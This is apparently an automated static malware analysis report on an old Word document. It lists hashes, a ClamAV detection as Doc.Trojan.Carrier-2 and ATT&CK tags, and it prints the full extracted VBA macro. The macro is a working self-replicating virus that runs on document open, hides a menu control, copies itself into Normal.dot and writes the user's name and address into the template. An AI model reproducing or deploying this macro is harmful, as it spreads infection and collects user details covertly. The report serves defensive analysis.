Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 30f25ce7c84c9e6b…

MALICIOUS

Office (OLE)

31.5 KB Created: 1998-08-29 16:06:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 9b6cf09fd8380d5336d9a43e4525264e SHA-1: 065044e8cbdcc932d440341ac7df2aecfb7a1bb7 SHA-256: 30f25ce7c84c9e6bf057da9a4620934cc42f0e3243b19acc91828fc49e3e592b
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro designed to infect the Normal.dot template. This macro copies its own code into the Normal.dot template, suggesting an attempt to establish persistence or prepare for further malicious actions. The macro also references 'spying Walker' and 'Lord Arz', which may be indicators of a specific malware family or campaign, though a definitive attribution cannot be made.

Heuristics 3

  • ClamAV: Doc.Trojan.Carrier-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Carrier-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1753 bytes
SHA-256: 33055db57c69fdc5e96efd6db051c9495f9114031cd59094a53d49f36fde9d94
Detection
ClamAV: Doc.Trojan.Carrier-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Rem BEGINN MODIFIED TDIE

End Sub

Private Sub Document_New()

End Sub

Private Sub Document_Open()
On Error Resume Next
NormInstalled = False
ActInstalled = False
WrittenBy = Lord_Arz
VirusName = "spying Walker"
Set ActCarrier = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NormCarrier = NormalTemplate.VBProject.VBComponents(1).CodeModule
Application.CommandBars("Tools").Controls(12).Visible = False

NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1)

If UCase(NI) = "REM BEGINN MODIFIED TDIE" Then NormInstalled = True
If UCase(AI) = "REM BEGINN MODIFIED TDIE" Then ActInstalled = True

If NormInstalled = True And ActInstalled = True Then GoTo PayLoad

If NormInstalled = False Then
    Set Infection = NormCarrier
    Set Carrier = ActCarrier
Else
    Set Infection = ActCarrier
    Set Carrier = NormCarrier
End If

With Carrier
    VirCode = .Lines(1, .CountOfLines)
End With
With Infection
    .DeleteLines 1, .CountOfLines
    .InsertLines 1, VirCode
End With
PayLoad:
ActPos = Application.UserName
For x = 1 To NormCarrier.CountOfLines
    If NormCarrier.Lines(x, 1) = "'" & ActPos Then Exit Sub
    If NormCarrier.Lines(x, 1) = "'I were at:" Then InsPos = x
Next x
NormCarrier.InsertLines InsPos + 1, "'" & ActPos & Chr(13) & "'Address: " & Application.UserAddress & "    infected on: " & Date
'I were at:
End Sub